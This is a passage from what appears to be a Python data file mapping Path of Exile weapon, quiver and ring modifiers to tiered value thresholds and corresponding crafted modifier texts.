"+# to Level of Socketed Melee Gems": [(3, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems'), (10, '1 to Level of Socketed Melee Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Level of Socketed Support Gems": [(3, '(2 - 3) to Quality of Socketed Support Gems'), (5, '(4 - 6) to Quality of Socketed Support Gems'), (10, '1 to Level of Socketed Support Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, 'Adds (1 - 2) to (3 - 4) Fire Damage to Attacks with this Weapon per 10 Strength')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to Weapon range": [(7, '1 to Weapon range'), (20, '2 to Weapon range')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+#% Critical Strike Multiplier while a Rare or Unique Enemy is Nearby": [(40, '(15 - 17) to Global Critical Strike Multiplier'), (80, '(18 - 20) to Global Critical Strike Multiplier'), (150, '(21 - 23) to Global Critical Strike Multiplier')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(25, '(15 - 17) to Global Critical Strike Multiplier'), (50, '(18 - 20) to Global Critical Strike Multiplier'), (75, '(21 - 23) to Global Critical Strike Multiplier'), (100, '(24 - 26) to Global Critical Strike Multiplier'), (200, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"Adds # to # Chaos Damage": [(200, 'Adds (4 - 9) to (11 - 21) Chaos Damage'), (320, 'Adds (10 - 18) to (22 - 34) Chaos Damage'), (1000, 'Adds (19 - 28) to (35 - 49) Chaos Damage')],
"Adds # to # Cold Damage": [(50, 'Adds (3 - 6) to (7 - 11) Cold Damage'), (100, 'Adds (7 - 10) to (12 - 18) Cold Damage'), (150, 'Adds (11 - 15) to (19 - 26) Cold Damage'), (200, 'Adds (16 - 20) to (27 - 35) Cold Damage'), (1000, 'Adds (21 - 25) to (36 - 43) Cold Damage')],
"Adds # to # Cold Damage to Spells": [(60, 'Adds (3 - 5) to (5 - 8) Cold Damage to Spells'), (120, 'Adds (5 - 7) to (9 - 13) Cold Damage to Spells'), (160, 'Adds (8 - 11) to (14 - 19) Cold Damage to Spells'), (180, 'Adds (12 - 14) to (19 - 25) Cold Damage to Spells'), (1000, 'Adds (15 - 18) to (26 - 31) Cold Damage to Spells')],
"Adds # to # Fire Damage": [(80, 'Adds (4 - 8) to (9 - 15) Fire Damage'), (160, 'Adds (9 - 12) to (16 - 23) Fire Damage'), (210, 'Adds (13 - 18) to (24 - 31) Fire Damage'), (250, 'Adds (19 - 24) to (32 - 43) Fire Damage'), (1000, 'Adds (25 - 30) to (44 - 53) Fire Damage')],
"Adds # to # Fire Damage to Spells": [(75, 'Adds (3 - 6) to (7 - 11) Fire Damage to Spells'), (150, 'Adds (7 - 9) to (12 - 17) Fire Damage to Spells'), (200, 'Adds (10 - 13) to (17 - 22) Fire Damage to Spells'), (230, 'Adds (14 - 17) to (23 - 31) Fire Damage to Spells'), (1000, 'Adds (18 - 21) to (31 - 38) Fire Damage to Spells')],
"Adds # to # Lightning Damage": [(150, 'Adds 1 to (16 - 25) Lightning Damage'), (300, 'Adds (1 - 2) to (26 - 40) Lightning Damage'), (375, 'Adds (1 - 3) to (41 - 55) Lightning Damage'), (430, 'Adds (2 - 5) to (56 - 70) Lightning Damage'), (1000, 'Adds (2 - 6) to (71 - 83) Lightning Damage')],
"Adds # to # Lightning Damage to Spells": [(100, 'Adds 1 to (12 - 18) Lightning Damage to Spells'), (200, 'Adds (1 - 2) to (19 - 28) Lightning Damage to Spells'), (300, 'Adds (1 - 3) to (29 - 39) Lightning Damage to Spells'), (370, 'Adds (2 - 4) to (40 - 49) Lightning Damage to Spells'), (1000, 'Adds (2 - 5) to (50 - 59) Lightning Damage to Spells')],
"Adds # to # Physical Damage": [(40, 'Adds 1 to 2 Physical Damage'), (80, 'Adds (2 - 3) to (3 - 4) Physical Damage'), (120, 'Adds (3 - 4) to (5 - 6) Physical Damage'), (135, 'Adds (5 - 6) to (7 - 8) Physical Damage'), (500, 'Adds (6 - 7) to (9 - 10) Physical Damage')],
"Attacks with this Weapon Penetrate #% Chaos Resistance": [(22, '(15 - 17)% increased Chaos Damage'), (44, '(18 - 20)% increased Chaos Damage'), (100, '(21 - 23)% increased Chaos Damage')],
"Attacks with this Weapon Penetrate #% Elemental Resistances": [(22, '(17 - 19)% increased Elemental Damage'), (44, '(20 - 22)% increased Elemental Damage'), (100, '(23 - 26)% increased Elemental Damage\nAttacks with this Weapon Penetrate 3% Elemental Resistances')],
"Auras from your Skills grant #% increased Damage to you and Allies": [(3, 'You and Allies affected by your Aura Skills deal (7 - 9)% increased Damage'), (5, 'You and Allies affected by your Aura Skills deal (10 - 12)% increased Damage'), (20, 'You and Allies affected by your Aura Skills deal (13 - 15)% increased Damage')],
"Curse Enemies with Level # Despair on Hit": [(11, '(18 - 20)% increased Chaos Damage'), (22, '(21 - 23)% increased Chaos Damage'), (50, '(24 - 26)% increased Chaos Damage')],
"Damage Penetrates #% Cold Resistance": [(11, '(21 - 23)% increased Cold Damage'), (22, '(24 - 26)% increased Cold Damage'), (50, '(27 - 30)% increased Cold Damage')],
"Damage Penetrates #% Fire Resistance": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(11, '(21 - 23)% increased Lightning Damage'), (22, '(24 - 26)% increased Lightning Damage'), (50, '(27 - 30)% increased Lightning Damage')],
"Gain #% of Cold Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Cold Damage'), (32, '(24 - 26)% increased Cold Damage'), (100, '(27 - 30)% increased Cold Damage\nGain (4 - 6)% of Cold Damage as Extra Chaos Damage')],
"Gain #% of Fire Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Fire Damage'), (32, '(24 - 26)% increased Fire Damage'), (100, '(27 - 30)% increased Fire Damage\nGain (4 - 6)% of Fire Damage as Extra Chaos Damage')],
"Gain #% of Lightning Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Lightning Damage'), (32, '(24 - 26)% increased Lightning Damage'), (100, '(27 - 30)% increased Lightning Damage\nGain (4 - 6)% of Lightning Damage as Extra Chaos Damage')],
"Gain #% of Non-Chaos Damage as extra Chaos Damage": [(5, '(15 - 17)% increased Chaos Damage'), (10, '(18 - 20)% increased Chaos Damage'), (50, '(21 - 23)% increased Chaos Damage')],
"Gain #% of Physical Damage as Extra Chaos Damage": [(16, '(19 - 22)% increased Global Physical Damage'), (32, '(23 - 26)% increased Global Physical Damage'), (100, '(27 - 30)% increased Global Physical Damage\nGain (4 - 6)% of Physical Damage as Extra Chaos Damage')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Hits can't be Evaded": [(1, '(10 - 15)% increased Global Accuracy Rating'), (2, '(20 - 25)% increased Global Accuracy Rating'), (5, '(30 - 35)% increased Global Accuracy Rating\n100% increased Global Accuracy Rating')],
"Minions deal #% increased Damage": [(90, 'Minions deal (19 - 22)% increased Damage'), (140, 'Minions deal (27 - 32)% increased Damage'), (180, 'Minions deal (23 - 26)% increased Damage'), (280, 'Minions deal (33 - 38)% increased Damage'), (500, 'Minions deal (27 - 30)% increased Damage'), (500, 'Minions deal (39 - 44)% increased Damage')],
"Socketed Skills deal #% more Attack Damage": [(44, '(23 - 26)% increased Attack Damage'), (88, '(27 - 30)% increased Attack Damage'), (200, '(31 - 35)% increased Attack Damage')],
"Socketed Skills deal #% more Spell Damage": [(44, '(23 - 26)% increased Spell Damage'), (88, '(27 - 30)% increased Spell Damage'), (200, '(31 - 35)% increased Spell Damage')],
"Triggers Level 20 Spectral Spirits when Equipped": [(4, 'Minions deal (11 - 12)% increased Damage'), (7, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage')],
"Your Hits inflict Decay, dealing 500 Chaos Damage per second for 8 seconds": [(1, '(15 - 17)% increased Chaos Damage'), (2, '(18 - 20)% increased Chaos Damage'), (10, '(21 - 23)% increased Chaos Damage')],
},
"Quiver": {
"# to # Cold Damage per Frenzy Charge": [(10, '(11 - 12)% increased Cold Damage'), (15, '(13 - 14)% increased Cold Damage'), (50, '(15 - 16)% increased Cold Damage\n4 to 7 Cold Damage per Frenzy Charge')],
"#% additional Physical Damage Reduction": [(6, '(-15 - -11) Physical Damage taken from Attacks'), (12, '(-20 - -16) Physical Damage taken from Attacks'), (50, '(-25 - -21) Physical Damage taken from Attacks')],
"#% chance to Avoid Cold Damage when Hit": [(14, '(11 - 12) to Cold Resistance'), (27, '(13 - 14) to Cold Resistance'), (50, '(15 - 16) to Cold Resistance\n(3 - 5)% chance to Avoid Cold Damage when Hit')],
"#% chance to Avoid Fire Damage when Hit": [(14, '(11 - 12) to Fire Resistance'), (27, '(13 - 14) to Fire Resistance'), (50, '(15 - 16) to Fire Resistance\n(3 - 5)% chance to Avoid Fire Damage when Hit')],
"#% chance to Avoid Lightning Damage when Hit": [(14, '(11 - 12) to Lightning Resistance'), (27, '(13 - 14) to Lightning Resistance'), (50, '(15 - 16) to Lightning Resistance\n(3 - 5)% chance to Avoid Lightning Damage when Hit')],
"#% chance to gain a Frenzy Charge when you Hit a Rare or Unique Enemy": [(6, '3% increased Attack Speed'), (12, '4% increased Attack Speed'), (50, '5% increased Attack Speed\n(5 - 10)% chance to gain a Frenzy Charge on Kill')],
"#% increased Attack Speed": [(30, '3% increased Attack Speed'), (35, '4% increased Attack Speed'), (100, '5% increased Attack Speed')],
"#% increased Attack and Cast Speed": [(15, '4% increased Attack and Cast Speed'), (50, '5% increased Attack and Cast Speed')],
"#% increased Damage with Poison": [(50, '(10 - 11)% increased Damage with Poison'), (100, '(12 - 13)% increased Damage with Poison'), (200, '(14 - 15)% increased Damage with Poison\n(8 - 12)% increased Poison Duration')],
"#% increased Elemental Damage if you've dealt a Critical Strike Recently": [(30, '(11 - 12)% increased Elemental Damage'), (60, '(13 - 14)% increased Elemental Damage'), (100, '(15 - 16)% increased Elemental Damage')],
"#% increased Elemental Damage with Attack Skills": [(40, '(12 - 13)% increased Elemental Damage with Attack Skills'), (80, '(14 - 15)% increased Elemental Damage with Attack Skills'), (115, '(16 - 18)% increased Elemental Damage with Attack Skills'), (130, '(19 - 21)% increased Elemental Damage with Attack Skills'), (200, '(22 - 24)% increased Elemental Damage with Attack Skills\nGain (8 - 10)% of Physical Damage as Extra Damage of a random Element')],
"#% increased Global Critical Strike Chance": [(40, '(26 - 28)% increased Global Critical Strike Chance'), (70, '(29 - 31)% increased Global Critical Strike Chance'), (90, '(32 - 34)% increased Global Critical Strike Chance'), (105, '(35 - 37)% increased Global Critical Strike Chance'), (300, '(38 - 40)% increased Global Critical Strike Chance')],
"#% increased Projectile Speed": [(40, '(9 - 10)% increased Projectile Speed'), (80, '(11 - 12)% increased Projectile Speed'), (115, '(13 - 14)% increased Projectile Speed'), (135, '(15 - 17)% increased Projectile Speed'), (200, '(18 - 20)% increased Projectile Speed\nBow Attacks fire an additional Arrow')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(18 - 25)% increased Stun Duration on Enemies\n(20 - 25)% increased Area of Effect if you have Stunned an Enemy Recently')],
"#% increased Vaal Skill Critical Strike Chance": [(170, '(21 - 30)% increased Vaal Skill Critical Strike Chance'), (340, '(31 - 40)% increased Vaal Skill Critical Strike Chance'), (500, '(40 - 50)% increased Global Critical Strike Chance if Corrupted')],
"#% increased maximum Mana": [(35, '(15 - 19) to maximum Mana'), (70, '(20 - 24) to maximum Mana'), (150, '(25 - 30) to maximum Mana\n(7 - 8)% increased maximum Mana')],
"#% of Life Regenerated per second": [(1.17, '(11.68 - 18.33) Life Regenerated per second'), (2.33, '(18.35 - 26.67) Life Regenerated per second'), (5.0, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.7, '(13 - 16)% increased Damage while Leeching Life'), (1.0, '(17 - 21)% increased Damage while Leeching Life'), (4.0, '(22 - 25)% increased Damage while Leeching Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (0.7, '(13 - 16)% increased Damage while Leeching Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (1.0, '(17 - 21)% increased Damage while Leeching Mana'), (4.0, '(22 - 25)% increased Damage while Leeching Mana')],
"#% reduced Reflected Damage taken": [(11, '(8 - 5)% reduced Reflected Damage taken'), (22, '(12 - 9)% reduced Reflected Damage taken'), (50, '(15 - 13)% reduced Reflected Damage taken')],
"+# Life gained on Kill": [(15, '(6 - 8) Life gained on Kill'), (25, '(9 - 11) Life gained on Kill'), (35, '(12 - 15) Life gained on Kill'), (100, '(12 - 15) Life gained on Kill\nRecover (1 - 2)% of Maximum Life on Kill')],
"+# Mana gained on Kill": [(5, '3 Mana gained on Kill'), (10, '4 Mana gained on Kill'), (15, '5 Mana gained on Kill'), (50, '5 Mana gained on Kill\nRecover (1 - 2)% of Maximum Mana on Kill')],
"+# to Accuracy Rating": [(250, '(10 - 11)% increased Global Accuracy Rating'), (500, '(12 - 13)% increased Global Accuracy Rating'), (750, '(14 - 15)% increased Global Accuracy Rating'), (1000, '(16 - 17)% increased Global Accuracy Rating'), (2000, 'Arrows Pierce an additional Target')],
"+# to Armour and Evasion Rating": [(350, '(7 - 9)% increased Armour\n(7 - 9)% increased Evasion Rating'), (700, '(10 - 12)% increased Armour\n(10 - 12)% increased Evasion Rating'), (1500, '(13 - 15)% increased Armour\n(13 - 15)% increased Evasion Rating')],
"+# to Dexterity": [(40, '(6 - 8) to Dexterity'), (70, '(9 - 11) to Dexterity'), (100, '(12 - 14) to Dexterity'), (130, '(15 - 17) to Dexterity'), (160, '(18 - 20) to Dexterity'), (200, '(18 - 20) to Dexterity\n(5 - 10)% chance to gain a Frenzy Charge on Kill')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating": [(150, '(7 - 9)% increased Evasion Rating'), (300, '(10 - 12)% increased Evasion Rating'), (450, '(13 - 15)% increased Evasion Rating'), (1000, '(13 - 15)% increased Evasion Rating\n(16 - 25)% chance to Avoid Elemental Ailments')],
"+# to Intelligence": [(40, '(6 - 8) to Intelligence'), (70, '(9 - 11) to Intelligence'), (100, '(12 - 14) to Intelligence'), (130, '(15 - 17) to Intelligence'), (160, '(18 - 20) to Intelligence'), (200, '(18 - 20) to Intelligence\n5% increased Intelligence')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, '(18 - 20) to Strength\n5% increased Strength')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to maximum Energy Shield": [(50, '(8 - 9)% increased Energy Shield Recharge Rate'), (100, '(10 - 11)% increased Energy Shield Recharge Rate'), (130, '(12 - 15)% increased Energy Shield Recharge Rate'), (500, '(12 - 15)% increased Energy Shield Recharge Rate\n0.3% of Spell Damage Leeched as Energy Shield')],
"+# to maximum Life": [(200, '4% increased maximum Life'), (280, '(5 - 6)% increased maximum Life'), (1000, '(7 - 8)% increased maximum Life')],
"+#% Chaos Resistance against Damage Over Time": [(50, '(5 - 6) to Chaos Resistance'), (100, '(7 - 8) to Chaos Resistance'), (200, '(9 - 10) to Chaos Resistance\n1 to maximum Chaos Resistance')],
"+#% chance to Evade Attacks": [(3, '(7 - 9)% increased Evasion Rating'), (5, '(10 - 12)% increased Evasion Rating'), (10, '(13 - 15)% increased Evasion Rating\nGrace has (15 - 20)% increased Aura Effect')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (100, '(9 - 10) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance\n1 to maximum Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (140, '(15 - 16) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance\n1 to maximum Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (140, '(15 - 16) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance\n1 to maximum Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(40, '(15 - 17) to Global Critical Strike Multiplier'), (70, '(18 - 20) to Global Critical Strike Multiplier'), (90, '(21 - 23) to Global Critical Strike Multiplier'), (105, '(24 - 26) to Global Critical Strike Multiplier'), (300, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (140, '(15 - 16) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance\n1 to maximum Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"Adds # to # Chaos Damage to Attacks": [(25, '8% increased Chaos Damage'), (45, '(9 - 10)% increased Chaos Damage'), (100, '(11 - 12)% increased Chaos Damage')],
"Adds # to # Cold Damage": [(25, '(9 - 10)% increased Cold Damage'), (100, '(11 - 12)% increased Cold Damage')],
"Adds # to # Cold Damage to Attacks": [(15, '8% increased Cold Damage'), (22, '(9 - 10)% increased Cold Damage'), (33, '(11 - 12)% increased Cold Damage'), (42, '(13 - 14)% increased Cold Damage'), (100, '(15 - 16)% increased Cold Damage\n(15 - 25)% of Physical Damage Converted to Cold Damage')],
"Adds # to # Fire Damage": [(25, '(9 - 10)% increased Fire Damage'), (100, '(11 - 12)% increased Fire Damage')],
"Adds # to # Fire Damage to Attacks": [(15, '8% increased Fire Damage'), (25, '(9 - 10)% increased Fire Damage'), (35, '(11 - 12)% increased Fire Damage'), (45, '(13 - 14)% increased Fire Damage'), (100, '(15 - 16)% increased Fire Damage\n(15 - 25)% of Physical Damage Converted to Fire Damage')],
"Adds # to # Lightning Damage": [(40, '(9 - 10)% increased Lightning Damage'), (100, '(11 - 12)% increased Lightning Damage')],
"Adds # to # Lightning Damage to Attacks": [(30, '8% increased Lightning Damage'), (45, '(9 - 10)% increased Lightning Damage'), (60, '(11 - 12)% increased Lightning Damage'), (75, '(13 - 14)% increased Lightning Damage'), (100, '(15 - 16)% increased Lightning Damage\n(15 - 25)% of Physical Damage Converted to Lightning Damage')],
"Adds # to # Physical Damage to Attacks": [(8, '8% increased Global Physical Damage'), (16, '(9 - 10)% increased Global Physical Damage'), (24, '(11 - 12)% increased Global Physical Damage'), (28, '(13 - 14)% increased Global Physical Damage'), (50, '(15 - 16)% increased Global Physical Damage\n(9 - 10)% reduced Enemy Stun Threshold')],
"Damage Penetrates #% Elemental Resistances": [(6, '(17 - 19)% increased Elemental Damage'), (12, '(20 - 22)% increased Elemental Damage'), (50, '(23 - 26)% increased Elemental Damage')],
"Gain #% of Physical Damage as Extra Fire Damage": [(11, '(11 - 12)% increased Fire Damage'), (22, '(13 - 14)% increased Fire Damage'), (50, '(15 - 16)% increased Fire Damage\nGain (6 - 8)% of Physical Damage as Extra Fire Damage')],
"Minions have #% increased Movement Speed": [(40, 'Minions have (4 - 5)% increased Movement Speed'), (75, 'Minions have (6 - 7)% increased Movement Speed'), (200, 'Minions have (8 - 10)% increased Movement Speed')],
"Projectiles Pierce an additional Target": [(5, 'Arrows Pierce an additional Target'), (10, 'Arrows Pierce an additional Target')],
},
"Ring": {
"# Life Regenerated per second": [(16.67, '(5.0 - 7.0) Life Regenerated per second'), (29.17, '(7.02 - 11.67) Life Regenerated per second'), (41.67, '(11.68 - 18.33) Life Regenerated per second'), (50.0, '(18.35 - 26.67) Life Regenerated per second'), (54.17, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second'), (58.33, '(26.68 - 40.0) Life Regenerated per second\n(0.8 - 0.93)% of Life Regenerated per second'), (83.33, '(26.68 - 40.0) Life Regenerated per second\n1.0% of Life Regenerated per second')],
"# to # Cold Damage per Frenzy Charge": [(10, '(11 - 12)% increased Cold Damage'), (15, '(13 - 14)% increased Cold Damage'), (50, '(15 - 16)% increased Cold Damage\n4 to 7 Cold Damage per Frenzy Charge')],
"#% chance when Hit for double Armour effect": [(25, '(7 - 9)% increased Armour'), (50, '(10 - 12)% increased Armour'), (100, '(13 - 15)% increased Armour\nDetermination has (15 - 20)% increased Aura Effect')],
"#% faster start of Energy Shield Recharge": [(65, '(8 - 9)% increased Energy Shield Recharge Rate'), (100, '(10 - 11)% increased Energy Shield Recharge Rate\n(4 - 6)% faster start of Energy Shield Recharge')],
"#% increased Attack Speed": [(15, '4% increased Attack Speed'), (50, '5% increased Attack Speed')],
"#% increased Cast Speed": [(15, '4% increased Cast Speed'), (50, '5% increased Cast Speed')],
"#% increased Chaos Damage": [(20, '8% increased Chaos Damage'), (40, '(9 - 10)% increased Chaos Damage'), (60, '(11 - 12)% increased Chaos Damage'), (80, '(13 - 14)% increased Chaos Damage'), (200, '(15 - 16)% increased Chaos Damage\nAdds (11 - 13) to (19 - 23) Chaos Damage')],
"#% increased Cold Damage": [(20, '8% increased Cold Damage'), (40, '(9 - 10)% increased Cold Damage'), (60, '(11 - 12)% increased Cold Damage'), (80, '(13 - 14)% increased Cold Damage'), (200, '(15 - 16)% increased Cold Damage\nAdds (12 - 16) to (24 - 28) Cold Damage')],
"#% increased Damage": [(25, '(10 - 11)% increased Damage'), (55, '(12 - 13)% increased Damage'), (100, '(14 - 15)% increased Damage')],
"#% increased Damage with Ailments": [(30, '8% increased Damage with Ailments'), (60, '(9 - 10)% increased Damage with Ailments'), (90, '(11 - 12)% increased Damage with Ailments'), (105, '(13 - 14)% increased Damage with Ailments'), (200, '(15 - 16)% increased Damage with Ailments\nPoisons you inflict deal Damage (7 - 10)% faster\nBleeding you inflict deals Damage (7 - 10)% faster\nIgnites you inflict deal Damage (7 - 10)% faster')],
"#% increased Damage with Poison": [(50, '(10 - 11)% increased Damage with Poison'), (100, '(12 - 13)% increased Damage with Poison'), (200, '(14 - 15)% increased Damage with Poison\n(8 - 12)% increased Poison Duration')],
"#% increased Effect of non-Damaging Ailments on Enemies": [(80, '(7 - 10)% increased Effect of Chill\n(7 - 10)% increased Effect of Shock'), (100, '(11 - 15)% increased Effect of Chill\n(11 - 15)% increased Effect of Shock')],
"#% increased Elemental Damage": [(20, '8% increased Elemental Damage'), (40, '(9 - 10)% increased Elemental Damage'), (60, '(11 - 12)% increased Elemental Damage'), (80, '(13 - 14)% increased Elemental Damage'), (200, '(15 - 16)% increased Elemental Damage\n0.2% of Elemental Damage Leeched as Life')],
"#% increased Elemental Damage with Attack Skills": [(40, '(12 - 13)% increased Elemental Damage with Attack Skills'), (80, '(14 - 15)% increased Elemental Damage with Attack Skills'), (115, '(16 - 18)% increased Elemental Damage with Attack Skills'), (130, '(19 - 21)% increased Elemental Damage with Attack Skills'), (200, '(22 - 24)% increased Elemental Damage with Attack Skills\nCurse Enemies with Level 5 Elemental Weakness on Hit')],
"#% increased Energy Shield from Body Armour": [(20, '(8 - 9)% increased Energy Shield Recharge Rate'), (40, '(10 - 11)% increased Energy Shield Recharge Rate'), (100, '(12 - 15)% increased Energy Shield Recharge Rate\nDiscipline has (15 - 20)% increased Aura Effect')],
"#% increased Fire Damage": [(20, '8% increased Fire Damage'), (40, '(9 - 10)% increased Fire Damage'), (60, '(11 - 12)% increased Fire Damage'), (80, '(13 - 14)% increased Fire Damage'), (200, '(15 - 16)% increased Fire Damage\nAdds (13 - 18) to (28 - 33) Fire Damage')],
"#% increased Global Critical Strike Chance": [(30, '(14 - 15)% increased Global Critical Strike Chance'), (60, '(16 - 17)% increased Global Critical Strike Chance'), (100, '(18 - 20)% increased Global Critical Strike Chance')],
"#% increased Global Physical Damage": [(40, '(9 - 10)% increased Global Physical Damage'), (100, '(11 - 12)% increased Global Physical Damage')],
